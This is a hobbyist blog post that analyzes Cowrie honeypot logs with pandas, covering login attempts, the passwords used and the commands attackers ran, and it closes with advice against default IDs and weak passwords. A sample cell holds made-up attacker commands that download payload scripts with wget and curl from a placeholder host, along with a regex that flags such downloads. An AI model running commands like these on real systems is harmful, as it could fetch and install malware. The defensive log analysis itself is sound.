I analyzed cowrie (honeypot) logs using Python pandas


In this article, I try analyzing honeypot logs with Python's pandas. It is purely a personal hobby project.

What is cowrie?

Cowrie is an SSH and Telnet honeypot: a deliberately exposed system that looks vulnerable in order to lure attackers and record what they do. (It is a low-interaction honeypot.) An introductory article is available here, so please have a look if you like: https://qiita.com/asmg07/items/73808eee7c960707da2b

Pre-analysis stage (about the JSON log)

Before you can analyze the log, you need to understand its contents. Rather than covering everything, I will pick out only what is needed for now.

Types of eventid (only the ones I used in my analysis)

eventid                  meaning
cowrie.login.success     Login succeeded
cowrie.login.failed      Login failed
cowrie.command.input     Command execution succeeded
cowrie.command.failed    Command execution failed
Reference site
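
As a minimal sketch of how these eventid values can be tallied, the following counts events per type with pandas. The records are made-up samples, not taken from my log; only the eventid strings come from the table above.

```python
import pandas as pd

# Made-up sample records for illustration; a real cowrie log has many more fields.
sample = pd.DataFrame({
    "eventid": [
        "cowrie.login.failed",
        "cowrie.login.failed",
        "cowrie.login.success",
        "cowrie.command.input",
        "cowrie.command.failed",
    ]
})

# Count how many times each event type appears, most frequent first.
event_counts = sample["eventid"].value_counts()
print(event_counts)

# Keep only the four event types used in this article.
wanted = [
    "cowrie.login.success",
    "cowrie.login.failed",
    "cowrie.command.input",
    "cowrie.command.failed",
]
subset = sample[sample["eventid"].isin(wanted)]
print(len(subset))
```

Running value_counts on the eventid column first is a quick way to see which event types dominate before filtering on any one of them.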


Actual log analysis using pandas


For the environment, I installed the Jupyter extension in VS Code and ran the program interactively there.

① Understanding the whole picture

#2020-12-13 cowrie log analysis
import pandas as pd #pandas for data analysis
import datetime #Standard datetime module
fname = 'cowrie.json' #Log file to read
df = pd.read_json(fname,lines=True) #Load the JSON Lines log into a DataFrame
df['timestamp']=pd.to_datetime(df['timestamp']) #Convert the timestamp column to datetime
df #display

Execution result: (screenshot 2020-12-20 21.42.02.png)
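
To show what the loading step does without needing a real log file, here is a small sketch that parses two made-up JSON Lines records from memory. The field names mirror the columns used in this article, but the values are hypothetical, and a real cowrie record carries more fields than these.

```python
import io
import pandas as pd

# Two made-up log lines in JSON Lines format (one JSON object per line).
# The values are hypothetical and only serve as an illustration.
raw = io.StringIO(
    '{"eventid": "cowrie.login.failed", "username": "root", "password": "password", '
    '"timestamp": "2020-12-13T00:00:01.000000Z"}\n'
    '{"eventid": "cowrie.login.success", "username": "root", "password": "admin", '
    '"timestamp": "2020-12-13T00:00:05.000000Z"}\n'
)

# lines=True tells pandas to parse each line as a separate JSON record.
sample = pd.read_json(raw, lines=True)

# Make sure the timestamp column is a UTC datetime, whatever read_json inferred.
sample["timestamp"] = pd.to_datetime(sample["timestamp"], utc=True)

print(sample.shape)
print(sample.dtypes)
```

Each JSON object becomes one row and each key becomes one column, which is why the later filters can refer to eventid and password directly.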

② Start analysis for each data you want to collect

(1) Extract logs of successful logins

#Extraction of logs for successful login
df2=df.query('eventid == "cowrie.login.success"') #Extract only cowrie.login.success logs
print("Number of successful logins:"+str(len(df2))) #Number of rows = number of successful logins
password=df2['password'].value_counts() #Count how often each password was used to log in
password1=df2['password'].value_counts(normalize=True) #Same counts as a proportion of all successful logins
print("Password frequency")
print(password) #Counts per password
print(password1) #Proportion per password

Execution result (partial excerpt): (screenshots 2020-12-20 21.50.54.png and 2020-12-20 21.51.28.png)
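
The difference between the plain counts and the normalize=True version is easier to see on a tiny example. This is only a sketch with made-up passwords, not data from my log.

```python
import pandas as pd

# Made-up passwords from hypothetical successful logins.
logins = pd.DataFrame({"password": ["admin", "admin", "1234", "admin", "root"]})

# Absolute count of each password, most frequent first.
counts = logins["password"].value_counts()

# Share of each password among all successful logins (the values sum to 1).
shares = logins["password"].value_counts(normalize=True)

# The most frequently used password (the mode) is the first index entry.
most_common = counts.index[0]

print(counts)
print(shares)
print("Most common password:", most_common)
```

The counts answer "how many times", while the normalized version answers "what fraction of all successful logins", which is easier to compare between days with different traffic.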

(2) Extract logs of failed logins

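#Extraction of logs that failed to log in
df2=df.query('eventid == "cowrie.login.failed"') #Extract only cowrie.login.failed logs
print("Number of login failures:"+str(len(df2))) #Number of rows = number of failed logins
print("Password frequency")
print(df2['password'].value_counts()) #Count how often each password was tried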

Execution result (partial excerpt): (screenshots 2020-12-20 21.55.22.png and 2020-12-20 21.56.24.png)
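
Passwords are more telling when paired with the user name they were tried with. The following is a rough sketch, assuming the log has username and password columns; all values here are made up for illustration.

```python
import pandas as pd

# Made-up login events; all values are hypothetical.
events = pd.DataFrame({
    "eventid": ["cowrie.login.failed"] * 4 + ["cowrie.login.success"],
    "username": ["pi", "pi", "root", "admin", "root"],
    "password": ["raspberry", "raspberry", "123456", "admin", "admin"],
})

# Keep only the failed login attempts.
failed = events[events["eventid"] == "cowrie.login.failed"]

# Count each (username, password) pair and sort from most to least frequent.
pair_counts = (
    failed.groupby(["username", "password"])
    .size()
    .sort_values(ascending=False)
)
print(pair_counts)
```

Grouping on both columns shows which default credential pairs attackers try most often, rather than passwords in isolation.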

(3) Extract the commands that were executed

#Commands that were successfully executed
df1=df.query('eventid == "cowrie.command.input"') #Extract only cowrie.command.input logs
df1 #display

Execution result: (screenshot 2020-12-20 21.58.09.png)
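
To narrow the command list down to likely downloads, one option is a simple pattern match on the command text. This is only a sketch: the column name input and every command below are assumptions made for illustration, and the list of tools (wget, curl, tftp) is my own choice rather than anything exhaustive.

```python
import pandas as pd

# Made-up command events; the "input" column name and all values are assumptions.
commands = pd.DataFrame({
    "eventid": ["cowrie.command.input"] * 4,
    "input": [
        "uname -a",
        "cd /tmp; wget http://example.com/payload.sh",
        "curl -O http://example.com/bin",
        "cat /proc/cpuinfo",
    ],
})

# Flag commands that call a common download tool (wget, curl or tftp).
is_download = commands["input"].str.contains(r"\b(?:wget|curl|tftp)\b", regex=True)
downloads = commands[is_download]
print(downloads["input"].tolist())
```

A match only means the command mentions one of these tools; whether the downloaded file is actually malware still has to be checked separately.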

Summary and discussion

Summary: I could not find many articles on analyzing cowrie logs with Python, so I tried it myself and wrote it up.

Discussion:

① Never use default server IDs such as root or admin
-Counting both failures and successes, there were 22,111 login attempts in a single day. Leaving the root or admin ID as it is on port 22 makes the server a likely target of attack.

② Setting a simple password is very dangerous
-The passwords extracted this time show that logins succeeded with relatively simple passwords. That is dangerous, so avoid them. Also, be aware that if you set up a server or system by following articles on the net without thinking it through, there is a risk that it will be targeted and easily broken into. Although those attempts failed this time, the passwords in the failed-login log make it obvious that the Raspberry Pi, which makes it relatively easy to build your own IoT device, is a common target of attacks.

③ Look at the commands being executed
-I did not go through everything in this log, but I can see that the attacker is downloading something. It may be malware ...


This time I only did a simple analysis of the logs, but in the future I hope to build a tool that can analyze them continuously. Thank you very much.
